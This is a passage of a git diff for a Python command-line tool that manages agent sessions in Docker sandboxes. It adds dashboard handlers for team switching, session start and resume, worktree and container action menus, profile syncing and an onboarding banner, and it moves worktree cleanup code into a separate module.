to ignore + + +def _handle_team_switch() -> None: + """Handle team switch request from dashboard. + + Shows the team picker and switches team if user selects one. + """ + from ... import config, teams + from ..keys import TeamSwitchRequested + from ..picker import pick_team + + console = get_err_console() + _prepare_for_nested_ui(console) + + try: + # Load config and org config for team list + cfg = config.load_user_config() + org_config = config.load_cached_org_config() + + available_teams = teams.list_teams(org_config) + if not available_teams: + print_with_layout(console, "[yellow]No teams available[/yellow]", max_width=120) + return + + # Get current team for marking + current_team = cfg.get("selected_profile") + + selected = pick_team( + available_teams, + current_team=str(current_team) if current_team else None, + title="Switch Team", + ) + + if selected: + # Update team selection + team_name = selected.get("name", "") + cfg["selected_profile"] = team_name + config.save_user_config(cfg) + print_with_layout( + console, + f"[green]Switched to team: {team_name}[/green]", + max_width=120, + ) + # If cancelled, just return to dashboard + + except TeamSwitchRequested: + # Nested team switch (shouldn't happen, but handle gracefully) + pass + except Exception as e: + print_with_layout( + console, + f"[red]Error switching team: {e}[/red]", + max_width=120, + ) + + +def _handle_start_flow(reason: str) -> app_dashboard.StartFlowResult: + """Handle start flow request from dashboard.""" + from ...commands.launch import run_start_wizard_flow + from ...commands.launch.flow_interactive import StartWizardFlowDecision + + console = get_err_console() + _prepare_for_nested_ui(console) + + # Handle worktree-specific start (Enter on worktree in details pane) + if reason.startswith("worktree:"): + worktree_path = reason[9:] # Remove "worktree:" prefix + return _handle_worktree_start(worktree_path) + + # For empty-state starts, skip Quick Resume (user intent is "create new") + skip_quick_resume = reason in ("no_containers", "no_sessions") + + # Show contextual message based on reason + if reason == "no_containers": + print_with_layout(console, "[dim]Starting a new session...[/dim]") + elif reason == "no_sessions": + print_with_layout(console, "[dim]Starting your first session...[/dim]") + console.print() + + wizard_result = run_start_wizard_flow(skip_quick_resume=skip_quick_resume, allow_back=True) + if wizard_result.decision is StartWizardFlowDecision.QUIT: + return app_dashboard.StartFlowResult(decision=app_dashboard.StartFlowDecision.QUIT) + if wizard_result.decision is StartWizardFlowDecision.LAUNCHED: + return app_dashboard.StartFlowResult(decision=app_dashboard.StartFlowDecision.LAUNCHED) + return app_dashboard.StartFlowResult( + decision=app_dashboard.StartFlowDecision.CANCELLED, + message=wizard_result.message, + ) + + +def _handle_worktree_start(worktree_path: str) -> app_dashboard.StartFlowResult: + """Handle starting a session in a specific worktree.""" + from pathlib import Path + + from rich.status import Status + + from ... import config + from ...application.launch import finalize_launch + from ...application.start_session import StartSessionRequest + from ...bootstrap import get_default_adapters + from ...commands.launch.conflict_resolution import ( + LaunchConflictDecision, + resolve_launch_conflict, + ) + from ...commands.launch.dependencies import prepare_live_start_plan + from ...commands.launch.preflight import ( + collect_launch_readiness, + ensure_launch_ready, + resolve_launch_provider, + ) + from ...commands.launch.render import show_auth_bootstrap_panel, show_launch_panel + from ...commands.launch.team_settings import _configure_team_settings + from ...commands.launch.workspace import ( + validate_and_resolve_workspace as _validate_and_resolve_workspace, + ) + from ...core.errors import ProviderNotReadyError + from ...ports.config_models import NormalizedOrgConfig + from ...theme import Spinners + from ...workspace_local_config import set_workspace_last_used_provider + + console = get_err_console() + + workspace_path = Path(worktree_path) + workspace_name = workspace_path.name + + # Validate workspace exists + if not workspace_path.exists(): + console.print(f"[red]Worktree no longer exists: {worktree_path}[/red]") + return app_dashboard.StartFlowResult.from_legacy(False) + + console.print(f"[cyan]Starting session in:[/cyan] {workspace_name}") + console.print() + + try: + # Obtain adapters early so the probe-backed runtime check can run + adapters = get_default_adapters() + + # Docker availability check (via RuntimeProbe) + with Status("[cyan]Checking Docker...[/cyan]", console=console, spinner=Spinners.DOCKER): + adapters.sandbox_runtime.ensure_available() + + # Validate and resolve workspace + resolved_path = _validate_and_resolve_workspace(str(workspace_path)) + if resolved_path is None: + console.print("[red]Workspace validation failed[/red]") + return app_dashboard.StartFlowResult.from_legacy(False) + workspace_path = resolved_path + + # Get current team from config + cfg = config.load_user_config() + team = cfg.get("selected_profile") + _configure_team_settings(team, cfg) + raw_org_config = config.load_cached_org_config() + normalized_org = ( + NormalizedOrgConfig.from_dict(raw_org_config) if raw_org_config is not None else None + ) + # Shared preflight: resolve → readiness → ensure ready + resolved_provider, _source = resolve_launch_provider( + cli_flag=None, + resume_provider=None, + workspace_path=workspace_path, + config_provider=config.get_selected_provider(), + normalized_org=normalized_org, + team=team, + adapters=adapters, + non_interactive=False, + ) + if resolved_provider is None: + return app_dashboard.StartFlowResult( + decision=app_dashboard.StartFlowDecision.CANCELLED, + message="Start cancelled", + ) + readiness = collect_launch_readiness(resolved_provider, _source, adapters) + if not readiness.launch_ready: + ensure_launch_ready( + readiness, + adapters=adapters, + console=console, + non_interactive=False, + show_notice=show_auth_bootstrap_panel, + ) + start_request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=team, + session_name=None, + resume=False, + fresh=False, + offline=False, + standalone=team is None, + dry_run=False, + allow_suspicious=False, + org_config=normalized_org, + raw_org_config=raw_org_config, + org_config_url=None, + provider_id=resolved_provider, + ) + start_dependencies, start_plan = prepare_live_start_plan( + start_request, + adapters=adapters, + console=console, + provider_id=resolved_provider, + ) + provider_adapter = start_dependencies.agent_provider + if provider_adapter is None: + console.print("[red]Provider wiring is unavailable for this start request[/red]") + return app_dashboard.StartFlowResult( + decision=app_dashboard.StartFlowDecision.CANCELLED, + message="Start cancelled", + ) + current_branch = start_plan.current_branch + + # Show session info + if team: + console.print(f"[dim]Team: {team}[/dim]") + if current_branch: + console.print(f"[dim]Branch: {current_branch}[/dim]") + console.print() + + conflict_resolution = resolve_launch_conflict( + start_plan, + dependencies=start_dependencies, + console=console, + display_name=provider_adapter.capability_profile().display_name, + json_mode=False, + non_interactive=False, + ) + if conflict_resolution.decision is LaunchConflictDecision.KEEP_EXISTING: + set_workspace_last_used_provider(workspace_path, resolved_provider) + return app_dashboard.StartFlowResult( + decision=app_dashboard.StartFlowDecision.CANCELLED, + message="Kept existing sandbox", + ) + if conflict_resolution.decision is LaunchConflictDecision.CANCELLED: + return app_dashboard.StartFlowResult( + decision=app_dashboard.StartFlowDecision.CANCELLED, + message="Start cancelled", + ) + + show_launch_panel( + workspace=workspace_path, + team=team, + session_name=None, + branch=current_branch, + is_resume=False, + display_name=provider_adapter.capability_profile().display_name, + ) + finalize_launch(conflict_resolution.plan, dependencies=start_dependencies) + set_workspace_last_used_provider(workspace_path, resolved_provider) + return app_dashboard.StartFlowResult.from_legacy(True) + + except KeyboardInterrupt: + console.print("\n[yellow]Cancelled[/yellow]") + return app_dashboard.StartFlowResult.from_legacy(False) + except ProviderNotReadyError as e: + console.print(f"[red]{e.user_message}[/red]") + if e.suggested_action: + console.print(f"[dim]{e.suggested_action}[/dim]") + return app_dashboard.StartFlowResult.from_legacy(False) + except Exception as e: + console.print(f"[red]Error starting session: {e}[/red]") + return app_dashboard.StartFlowResult.from_legacy(False) + + +def _handle_session_resume(session: SessionSummary) -> bool: + """Resume a session from the dashboard. + + This function executes OUTSIDE Rich Live context (the dashboard has + already exited via the exception unwind before this is called). + + Args: + session: Session summary containing workspace, team, branch, container_name, etc. + + Returns: + True if session was resumed successfully, False if resume failed + (e.g., workspace no longer exists). + """ + + from pathlib import Path + + from rich.status import Status + + from ... import config + from ...application.launch import finalize_launch + from ...application.start_session import StartSessionRequest + from ...bootstrap import get_default_adapters + from ...commands.launch.conflict_resolution import ( + LaunchConflictDecision, + resolve_launch_conflict, + ) + from ...commands.launch.dependencies import prepare_live_start_plan + from ...commands.launch.preflight import ( + collect_launch_readiness, + ensure_launch_ready, + resolve_launch_provider, + ) + from ...commands.launch.render import show_auth_bootstrap_panel, show_launch_panel + from ...commands.launch.team_settings import _configure_team_settings + from ...commands.launch.workspace import ( + validate_and_resolve_workspace as _validate_and_resolve_workspace, + ) + from ...core.errors import ProviderNotReadyError + from ...ports.config_models import NormalizedOrgConfig + from ...theme import Spinners + from ...workspace_local_config import set_workspace_last_used_provider + + console = get_err_console() + _prepare_for_nested_ui(console) + + # Extract session info + workspace = session.workspace + team = session.team # May be None for standalone + session_name = session.name + branch = session.branch + + if not workspace: + console.print("[red]Session has no workspace path[/red]") + return False + + # Validate workspace still exists + workspace_path = Path(workspace) + if not workspace_path.exists(): + console.print(f"[red]Workspace no longer exists: {workspace}[/red]") + console.print("[dim]The session may have been deleted or moved.[/dim]") + return False + + try: + # Obtain adapters early so the probe-backed runtime check can run + adapters = get_default_adapters() + + # Docker availability check (via RuntimeProbe) + with Status("[cyan]Checking Docker...[/cyan]", console=console, spinner=Spinners.DOCKER): + adapters.sandbox_runtime.ensure_available() + + # Validate and resolve workspace (we know it exists from earlier check) + resolved_path = _validate_and_resolve_workspace(str(workspace_path)) + if resolved_path is None: + console.print("[red]Workspace validation failed[/red]") + return False + workspace_path = resolved_path + + # Configure team settings + cfg = config.load_user_config() + _configure_team_settings(team, cfg) + raw_org_config_2 = config.load_cached_org_config() + normalized_org = ( + NormalizedOrgConfig.from_dict(raw_org_config_2) + if raw_org_config_2 is not None + else None + ) + # Shared preflight: resolve → readiness → ensure ready + resolved_provider, _source = resolve_launch_provider( + cli_flag=None, + resume_provider=session.provider_id, + workspace_path=workspace_path, + config_provider=config.get_selected_provider(), + normalized_org=normalized_org, + team=team, + adapters=adapters, + non_interactive=False, + ) + if resolved_provider is None: + return False + readiness = collect_launch_readiness(resolved_provider, _source, adapters) + if not readiness.launch_ready: + ensure_launch_ready( + readiness, + adapters=adapters, + console=console, + non_interactive=False, + show_notice=show_auth_bootstrap_panel, + ) + start_request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=team, + session_name=session_name, + resume=True, + fresh=False, + offline=False, + standalone=team is None, + dry_run=False, + allow_suspicious=False, + org_config=normalized_org, + raw_org_config=raw_org_config_2, + org_config_url=None, + provider_id=resolved_provider, + ) + start_dependencies, start_plan = prepare_live_start_plan( + start_request, + adapters=adapters, + console=console, + provider_id=resolved_provider, + ) + provider_adapter = start_dependencies.agent_provider + if provider_adapter is None: + console.print("[red]Provider wiring is unavailable for this session[/red]") + return False + current_branch = start_plan.current_branch + + # Use session's stored branch if available (more accurate than detected) + if branch: + current_branch = branch + + # Show resume info + workspace_name = workspace_path.name + print_with_layout(console, f"[cyan]Resuming session:[/cyan] {workspace_name}") + if team: + print_with_layout(console, f"[dim]Team: {team}[/dim]") + if current_branch: + print_with_layout(console, f"[dim]Branch: {current_branch}[/dim]") + console.print() + + conflict_resolution = resolve_launch_conflict( + start_plan, + dependencies=start_dependencies, + console=console, + display_name=provider_adapter.capability_profile().display_name, + json_mode=False, + non_interactive=False, + ) + if conflict_resolution.decision is LaunchConflictDecision.KEEP_EXISTING: + set_workspace_last_used_provider(workspace_path, resolved_provider) + return True + if conflict_resolution.decision is LaunchConflictDecision.CANCELLED: + return False + + show_launch_panel( + workspace=workspace_path, + team=team, + session_name=session_name, + branch=current_branch, + is_resume=True, + display_name=provider_adapter.capability_profile().display_name, + ) + finalize_launch(conflict_resolution.plan, dependencies=start_dependencies) + set_workspace_last_used_provider(workspace_path, resolved_provider) + return True + + except ProviderNotReadyError as e: + console.print(f"[red]{e.user_message}[/red]") + if e.suggested_action: + console.print(f"[dim]{e.suggested_action}[/dim]") + return False + except Exception as e: + console.print(f"[red]Error resuming session: {e}[/red]") + return False + + +def _handle_statusline_install() -> bool: + """Handle statusline installation request from dashboard. + + Installs the statusline enhancement using the same logic + as `scc statusline`. Works cross-platform (Windows, macOS, Linux). + + Returns: + True if statusline was installed successfully, False otherwise. + """ + from rich.status import Status + + from ...commands.admin import install_statusline + from ...theme import Spinners + + console = get_err_console() + _prepare_for_nested_ui(console) + + console.print("[cyan]Installing statusline...[/cyan]") + console.print() + + try: + with Status( + "[cyan]Configuring statusline...[/cyan]", + console=console, + spinner=Spinners.DOCKER, + ): + result = install_statusline() + + if result: + console.print("[green]✓ Statusline installed successfully![/green]") + console.print("[dim]Press any key to continue...[/dim]") + else: + console.print("[yellow]Statusline installation completed with warnings[/yellow]") + + return result + + except Exception as e: + console.print(f"[red]Error installing statusline: {e}[/red]") + return False + + +def _handle_recent_workspaces() -> str | None: + """Handle recent workspaces picker from dashboard. + + Shows a picker with recently used workspaces, allowing the user to + quickly navigate to a previous project. + + Returns: + Path of selected workspace, or None if cancelled. + """ + from ...contexts import load_recent_contexts + from ..picker import pick_context + + console = get_err_console() + _prepare_for_nested_ui(console) + + try: + recent = load_recent_contexts() + if not recent: + console.print("[yellow]No recent workspaces found[/yellow]") + console.print( + "[dim]Start a session with `scc start ` to populate this list.[/dim]" + ) + return None + + selected = pick_context( + recent, + title="Recent Workspaces", + subtitle="Select a workspace", + ) + + if selected: + return str(selected.worktree_path) + return None + + except Exception as e: + console.print(f"[red]Error loading recent workspaces: {e}[/red]") + return None + + +def _handle_git_init() -> bool: + """Handle git init request from dashboard. + + Initializes a new git repository in the current directory, + optionally creating an initial commit. + + Returns: + True if git was initialized successfully, False otherwise. + """ + import os + import subprocess + + console = get_err_console() + _prepare_for_nested_ui(console) + + cwd = os.getcwd() + console.print(f"[cyan]Initializing git repository in:[/cyan] {cwd}") + console.print() + + try: + # Run git init + result = subprocess.run( + ["git", "init"], + cwd=cwd, + capture_output=True, + text=True, + check=True, + ) + console.print(f"[green]✓ {result.stdout.strip()}[/green]") + + # Optionally create initial commit + console.print() + console.print("[dim]Creating initial empty commit...[/dim]") + + # Try to create an empty commit + try: + subprocess.run( + ["git", "commit", "--allow-empty", "-m", "Initial commit"], + cwd=cwd, + capture_output=True, + text=True, + check=True, + ) + console.print("[green]✓ Initial commit created[/green]") + except subprocess.CalledProcessError as e: + # May fail if git identity not configured + if "user.email" in e.stderr or "user.name" in e.stderr: + console.print("[yellow]Tip: Configure git identity to enable commits:[/yellow]") + console.print(" git config user.name 'Your Name'") + console.print(" git config user.email 'your@email.com'") + else: + console.print( + f"[yellow]Could not create initial commit: {e.stderr.strip()}[/yellow]" + ) + + console.print() + console.print("[dim]Press any key to continue...[/dim]") + return True + + except subprocess.CalledProcessError as e: + console.print(f"[red]Git init failed: {e.stderr.strip()}[/red]") + return False + except FileNotFoundError: + console.print("[red]Git is not installed or not in PATH[/red]") + return False + + +def _handle_create_worktree() -> bool: + """Handle create worktree request from dashboard. + + Prompts for a worktree name and creates a new git worktree. + + Returns: + True if worktree was created successfully, False otherwise. + """ + console = get_err_console() + _prepare_for_nested_ui(console) + + console.print("[cyan]Create new worktree[/cyan]") + console.print() + console.print("[dim]Use `scc worktree create ` from the terminal for full options.[/dim]") + console.print("[dim]Press any key to continue...[/dim]") + + # For now, just inform user of CLI option + # Full interactive creation can be added in a future phase + return False + + +def _handle_clone() -> bool: + """Handle clone request from dashboard. + + Informs user how to clone a repository. + + Returns: + True if clone was successful, False otherwise. + """ + console = get_err_console() + _prepare_for_nested_ui(console) + + console.print("[cyan]Clone a repository[/cyan]") + console.print() + console.print("[dim]Use `git clone ` to clone a repository, then run `scc` in it.[/dim]") + console.print("[dim]Press any key to continue...[/dim]") + + # For now, just inform user of git clone option + # Full interactive clone can be added in a future phase + return False + + +def _handle_container_action_menu(container_id: str, container_name: str) -> str | None: + """Show a container actions menu and execute the selected action.""" + import subprocess + + from ... import docker + from ..list_screen import ListItem, ListScreen + + console = get_err_console() + _prepare_for_nested_ui(console) + + status = docker.get_container_status(container_name) or "" + is_running = status.startswith("Up") + + items: list[ListItem[str]] = [] + + if is_running: + items.append( + ListItem( + value="attach_shell", + label="Attach shell", + description="docker exec -it bash", + ) + ) + items.append( + ListItem( + value="stop", + label="Stop container", + description="Stop running container", + ) + ) + else: + items.append( + ListItem( + value="resume", + label="Resume container", + description="Start stopped container", + ) + ) + items.append( + ListItem( + value="delete", + label="Delete container", + description="Remove stopped container", + ) + ) + + if not items: + return "No actions available" + + screen = ListScreen(items, title=f"Actions — {container_name}") + selected = screen.run() + if not selected: + return "Cancelled" + + if selected == "attach_shell": + cmd = ["docker", "exec", "-it", container_name, "bash"] + result = subprocess.run(cmd) + return "Shell closed" if result.returncode == 0 else "Shell exited with errors" + + if selected == "stop": + _, message = _handle_container_stop(container_id, container_name) + return message + + if selected == "resume": + _, message = _handle_container_resume(container_id, container_name) + return message + + if selected == "delete": + _, message = _handle_container_remove(container_id, container_name) + return message + + return None + + +def _handle_session_action_menu(session: SessionSummary) -> str | None: + """Show a session actions menu and execute the selected action.""" + from ... import sessions as session_store + from ..list_screen import ListItem, ListScreen + + console = get_err_console() + _prepare_for_nested_ui(console) + + items: list[ListItem[str]] = [ + ListItem(value="resume", label="Resume session", description="Continue this session"), + ] + + items.append( + ListItem( + value="remove", + label="Remove from history", + description="Does not delete any containers", + ) + ) + + screen = ListScreen(items, title="Session Actions") + selected = screen.run() + if not selected: + return "Cancelled" + + if selected == "resume": + try: + success = _handle_session_resume(session) + return "Resumed session" if success else "Resume failed" + except Exception: + return "Resume failed" + + if selected == "remove": + workspace = session.workspace + branch = session.branch + if not workspace: + return "Missing workspace" + removed = session_store.remove_session(workspace, branch) + return "Removed from history" if removed else "No matching session found" + + return None + + +def _handle_worktree_action_menu(worktree_path: str) -> str | None: + """Show a worktree actions menu and execute the selected action.""" + import subprocess + from pathlib import Path + + from ..list_screen import ListItem, ListScreen + + console = get_err_console() + _prepare_for_nested_ui(console) + + items: list[ListItem[str]] = [ + ListItem(value="start", label="Start session here", description="Launch agent"), + ListItem( + value="open_shell", + label="Open shell", + description="cd into this worktree", + ), + ListItem( + value="remove", + label="Remove worktree", + description="git worktree remove ", + ), + ] + + screen = ListScreen(items, title=f"Worktree Actions — {Path(worktree_path).name}") + selected = screen.run() + if not selected: + return "Cancelled" + + if selected == "start": + # Reuse worktree start flow directly + result = _handle_worktree_start(worktree_path) + if result.decision is app_dashboard.StartFlowDecision.QUIT: + return "Cancelled" + if result.decision is app_dashboard.StartFlowDecision.LAUNCHED: + return "Started session" + return result.message or "Start cancelled" + + if selected == "open_shell": + console.print(f"[cyan]cd {worktree_path}[/cyan]") + console.print("[dim]Copy/paste to jump into this worktree.[/dim]") + return "Path copied to screen" + + if selected == "remove": + if not Confirm.ask( + "[yellow]Remove this worktree? This cannot be undone.[/yellow]", + default=False, + ): + return "Cancelled" + try: + subprocess.run(["git", "worktree", "remove", "--force", worktree_path], check=True) + return "Worktree removed" + except Exception: + return "Failed to remove worktree" + + return None diff --git a/src/scc_cli/ui/dashboard/orchestrator_menus.py b/src/scc_cli/ui/dashboard/orchestrator_menus.py new file mode 100644 index 0000000..8fbb7fd --- /dev/null +++ b/src/scc_cli/ui/dashboard/orchestrator_menus.py @@ -0,0 +1,346 @@ +"""Settings, profile, sandbox, and onboarding handlers for the dashboard. + +Extracted from orchestrator_handlers.py to reduce module size. +All handlers follow the same pattern: get err console, prepare terminal, +execute handler logic, return result for apply_dashboard_effect_result. +""" + +from __future__ import annotations + +from ...confirm import Confirm +from ...console import get_err_console +from ..chrome import print_with_layout + + +def _prepare_for_nested_ui_menu() -> None: + """Prepare console for nested UI - local helper to avoid cross-import.""" + console = get_err_console() + console.clear() + console.show_cursor(True) + + +def _handle_settings() -> str | None: + """Handle settings and maintenance screen request from dashboard. + + Shows the settings and maintenance TUI, allowing users to perform + maintenance operations like clearing cache, pruning sessions, etc. + + Returns: + Success message string if an action was performed, None if cancelled. + """ + from ..settings import run_settings_screen + + console = get_err_console() + _prepare_for_nested_ui_menu() + + try: + return run_settings_screen() + except Exception as e: + console.print(f"[red]Error in settings screen: {e}[/red]") + return None + + +def _handle_profile_menu() -> str | None: + """Handle profile quick menu request from dashboard. + + Shows a quick menu with profile actions: save, apply, diff, settings. + + Returns: + Success message string if an action was performed, None if cancelled. + """ + from pathlib import Path + + from ..list_screen import ListItem, ListScreen + + console = get_err_console() + _prepare_for_nested_ui_menu() + + items: list[ListItem[str]] = [ + ListItem( + value="save", + label="Save current settings", + description="Capture workspace settings to profile", + ), + ListItem( + value="apply", + label="Apply saved profile", + description="Restore settings from profile", + ), + ListItem( + value="diff", + label="Show diff", + description="Compare profile vs workspace", + ), + ListItem( + value="settings", + label="Open in Settings", + description="Full profile management", + ), + ] + + screen = ListScreen(items, title="[cyan]Profile[/cyan]") + selected = screen.run() + + if not selected: + return None + + # Import profile functions + from scc_cli.marketplace.managed import load_managed_state + + from ...core.personal_profiles import ( + compute_fingerprints, + load_personal_profile, + load_workspace_mcp, + load_workspace_settings, + merge_personal_mcp, + merge_personal_settings, + save_applied_state, + save_personal_profile, + write_workspace_mcp, + write_workspace_settings, + ) + + workspace = Path.cwd() + + if selected == "save": + try: + settings = load_workspace_settings(workspace) + mcp = load_workspace_mcp(workspace) + save_personal_profile(workspace, settings, mcp) + return "Profile saved" + except Exception as e: + console.print(f"[red]Save failed: {e}[/red]") + return "Profile save failed" + + if selected == "apply": + profile = load_personal_profile(workspace) + if not profile: + console.print("[yellow]No profile saved for this workspace[/yellow]") + return "No profile to apply" + try: + # Load current workspace settings + current_settings = load_workspace_settings(workspace) or {} + current_mcp = load_workspace_mcp(workspace) or {} + + # Merge profile into workspace + if profile.settings: + merged_settings = merge_personal_settings( + workspace, + current_settings, + profile.settings, + managed_state_loader=load_managed_state, + ) + write_workspace_settings(workspace, merged_settings) + + if profile.mcp: + merged_mcp = merge_personal_mcp(current_mcp, profile.mcp) + write_workspace_mcp(workspace, merged_mcp) + + # Update applied state + fingerprints = compute_fingerprints(workspace) + save_applied_state(workspace, profile.profile_id, fingerprints) + + return "Profile applied" + except Exception as e: + console.print(f"[red]Apply failed: {e}[/red]") + return "Profile apply failed" + + if selected == "diff": + profile = load_personal_profile(workspace) + if not profile: + console.print("[yellow]No profile saved for this workspace[/yellow]") + return "No profile to compare" + + # Show structured diff overlay + from rich import box + from rich.panel import Panel + + from ...core.personal_profiles import ( + compute_structured_diff, + load_workspace_mcp, + load_workspace_settings, + ) + + current_settings = load_workspace_settings(workspace) or {} + current_mcp = load_workspace_mcp(workspace) or {} + + diff = compute_structured_diff( + workspace_settings=current_settings, + profile_settings=profile.settings, + workspace_mcp=current_mcp, + profile_mcp=profile.mcp, + ) + + if diff.is_empty: + console.print("[green]✓ Profile is in sync with workspace[/green]") + return "Profile in sync" + + # Build diff content + lines: list[str] = [] + current_section = "" + indicators = { + "added": "[green]+[/green]", + "removed": "[red]−[/red]", + "modified": "[yellow]~[/yellow]", + } + section_names = { + "plugins": "plugins", + "mcp_servers": "mcp_servers", + "marketplaces": "marketplaces", + } + + for item in diff.items[:12]: # Smart fallback: limit to 12 items + if item.section != current_section: + if current_section: + lines.append("") + lines.append(f" [bold]{section_names.get(item.section, item.section)}[/bold]") + current_section = item.section + indicator = indicators.get(item.status, " ") + modifier = " [dim](modified)[/dim]" if item.status == "modified" else "" + lines.append(f" {indicator} {item.name}{modifier}") + + if diff.total_count > 12: + lines.append("") + lines.append(f" [dim]+ {diff.total_count - 12} more...[/dim]") + + lines.append("") + lines.append(f" [dim]{diff.total_count} difference(s)[/dim]") + + console.print() + console.print( + Panel( + "\n".join(lines), + title="[bold]Profile Diff[/bold]", + border_style="bright_black", + box=box.ROUNDED, + padding=(1, 2), + ) + ) + return "Diff shown" + + if selected == "settings": + # Open settings TUI on Profiles tab + from ..settings import run_settings_screen + + return run_settings_screen(initial_category="PROFILES") + + return None + + +def _handle_sandbox_import() -> str | None: + """Handle sandbox plugin import request from dashboard. + + Detects plugins installed in the sandbox but not in the workspace settings, + and prompts the user to import them. + + Returns: + Success message string if imports were made, None if cancelled or no imports. + """ + import os + from pathlib import Path + + from ...core.personal_profiles import ( + compute_sandbox_import_candidates, + load_workspace_settings, + merge_sandbox_imports, + write_workspace_settings, + ) + from ...docker.launch import get_sandbox_settings + + console = get_err_console() + _prepare_for_nested_ui_menu() + + workspace = Path(os.getcwd()) + + # Get current workspace settings + workspace_settings = load_workspace_settings(workspace) or {} + + # Get sandbox settings from Docker volume + console.print("[dim]Checking sandbox for plugin changes...[/dim]") + sandbox_settings = get_sandbox_settings() + + if not sandbox_settings: + console.print("[yellow]No sandbox settings found.[/yellow]") + console.print("[dim]Start a session first to create sandbox settings.[/dim]") + return None + + # Compute what's in sandbox but not in workspace + missing_plugins, missing_marketplaces = compute_sandbox_import_candidates( + workspace_settings, sandbox_settings + ) + + if not missing_plugins and not missing_marketplaces: + console.print("[green]✓ No new plugins to import.[/green]") + console.print("[dim]Workspace is in sync with sandbox.[/dim]") + return "No imports needed" + + # Show preview of what will be imported + console.print() + console.print("[yellow]Sandbox plugins available for import:[/yellow]") + if missing_plugins: + for plugin in missing_plugins: + console.print(f" [cyan]+[/cyan] {plugin}") + if missing_marketplaces: + for name in sorted(missing_marketplaces.keys()): + console.print(f" [cyan]+[/cyan] marketplace: {name}") + console.print() + + # Confirm import + if not Confirm.ask("Import these into workspace settings?", default=True): + return None + + # Merge and write to workspace settings + try: + merged_settings = merge_sandbox_imports( + workspace_settings, missing_plugins, missing_marketplaces + ) + write_workspace_settings(workspace, merged_settings) + + total = len(missing_plugins) + len(missing_marketplaces) + console.print(f"[green]✓ Imported {total} item(s) to workspace settings.[/green]") + return f"Imported {total} plugin(s)" + + except Exception as e: + console.print(f"[red]Import failed: {e}[/red]") + return "Import failed" + + +def _show_onboarding_banner() -> None: + """Show one-time onboarding banner for new users. + + Displays a brief tip about `scc worktree enter` as the recommended + way to switch worktrees without shell configuration. + + Waits for user to press any key before continuing. + """ + import readchar + from rich import box + from rich.panel import Panel + + console = get_err_console() + + # Create a compact onboarding message + message = ( + "[bold cyan]Welcome to SCC![/bold cyan]\n\n" + "[yellow]Tip:[/yellow] Use [bold]scc worktree enter[/bold] to switch worktrees.\n" + "No shell setup required — just type [dim]exit[/dim] to return.\n\n" + "[dim]Press [bold]?[/bold] anytime for help, or any key to continue...[/dim]" + ) + + console.print() + print_with_layout( + console, + Panel( + message, + title="[bold]Getting Started[/bold]", + border_style="bright_black", + box=box.ROUNDED, + padding=(1, 2), + ), + max_width=120, + constrain=True, + ) + console.print() + + # Wait for any key + readchar.readkey() diff --git a/src/scc_cli/ui/git_interactive.py b/src/scc_cli/ui/git_interactive.py index c972e60..4e147bd 100644 --- a/src/scc_cli/ui/git_interactive.py +++ b/src/scc_cli/ui/git_interactive.py @@ -18,8 +18,6 @@ from rich import box from rich.console import Console from rich.table import Table -from rich.text import Text -from rich.tree import Tree from ..core.constants import WORKTREE_BRANCH_PREFIX from ..core.errors import ( @@ -38,7 +36,6 @@ PROTECTED_BRANCHES, get_current_branch, get_default_branch, - get_uncommitted_files, sanitize_branch_name, ) from ..services.git.core import has_remote, is_git_repo @@ -50,8 +47,13 @@ from ..theme import Indicators, Spinners from ..utils.locks import file_lock, lock_path from .chrome import get_layout_metrics, print_with_layout +from .git_interactive_ops import ( # noqa: F401 + cleanup_worktree, + install_dependencies, + install_hooks, +) from .git_render import render_worktrees_table -from .prompts import confirm_with_layout, prompt_with_layout +from .prompts import confirm_with_layout, prompt_with_layout # noqa: F401 # ═══════════════════════════════════════════════════════════════════════════════ # Branch Safety - Interactive UI @@ -59,7 +61,7 @@ def check_branch_safety(path: Path, console: Console) -> bool: - """Check if current branch is safe for Claude Code work. + """Check if current branch is safe for agent work. Display a visual "speed bump" for protected branches with interactive options to create a feature branch or continue. @@ -84,7 +86,7 @@ def check_branch_safety(path: Path, console: Console) -> bool: warning = create_warning_panel( "Protected Branch", f"You are on branch '{current}'\n\n" - "For safety, Claude Code work should happen on a feature branch.\n" + "For safety, agent work should happen on a feature branch.\n" "Direct pushes to protected branches are blocked by git hooks.", "Create a feature branch for isolated, safe development", ) @@ -470,260 +472,7 @@ def list_worktrees( return worktrees -def cleanup_worktree( - repo_path: Path, - name: str, - force: bool, - console: Console, - *, - skip_confirm: bool = False, - dry_run: bool = False, -) -> bool: - """Clean up a worktree with safety checks and visual feedback. - - Show uncommitted changes before deletion to prevent accidental data loss. - - Args: - repo_path: Path to the main repository. - name: Name of the worktree to remove. - force: If True, remove even if worktree has uncommitted changes. - console: Rich console for output. - skip_confirm: If True, skip interactive confirmations (--yes flag). - dry_run: If True, show what would be removed but don't actually remove. - - Returns: - True if worktree was removed (or would be in dry-run mode), False otherwise. - """ - safe_name = sanitize_branch_name(name) - branch_name = f"{WORKTREE_BRANCH_PREFIX}{safe_name}" - worktree_base = repo_path.parent / f"{repo_path.name}-worktrees" - worktree_path = worktree_base / safe_name - - if not worktree_path.exists(): - console.print() - console.print( - create_warning_panel( - "Worktree Not Found", - f"No worktree found at: {worktree_path}", - "Use 'scc worktrees ' to list available worktrees", - ) - ) - return False - - console.print() - if dry_run: - console.print( - create_info_panel( - "Dry Run: Cleanup Worktree", - f"Worktree: {safe_name}", - f"Path: {worktree_path}", - ) - ) - else: - console.print( - create_info_panel( - "Cleanup Worktree", f"Worktree: {safe_name}", f"Path: {worktree_path}" - ) - ) - console.print() - - # Check for uncommitted changes - show evidence - if not force: - uncommitted = get_uncommitted_files(worktree_path) - - if uncommitted: - # Build a tree of files that will be lost - tree = Tree(f"[red bold]Uncommitted Changes ({len(uncommitted)})[/red bold]") - - for f in uncommitted[:10]: # Show max 10 - tree.add(Text(f, style="dim")) - - if len(uncommitted) > 10: - tree.add(Text(f"...and {len(uncommitted) - 10} more", style="dim italic")) - - console.print(tree) - console.print() - console.print("[red bold]These changes will be permanently lost.[/red bold]") - console.print() - - # Skip confirmation prompt if --yes was provided - if not skip_confirm: - if not confirm_with_layout( - console, - "[yellow]Delete worktree anyway?[/yellow]", - default=False, - ): - console.print("[dim]Cleanup cancelled.[/dim]") - return False - - # Dry run: show what would be removed without actually removing - if dry_run: - console.print(" [cyan]Would remove:[/cyan]") - console.print(f" - Worktree: {worktree_path}") - console.print(f" - Branch: {branch_name} [dim](if confirmed)[/dim]") - console.print() - console.print("[dim]Dry 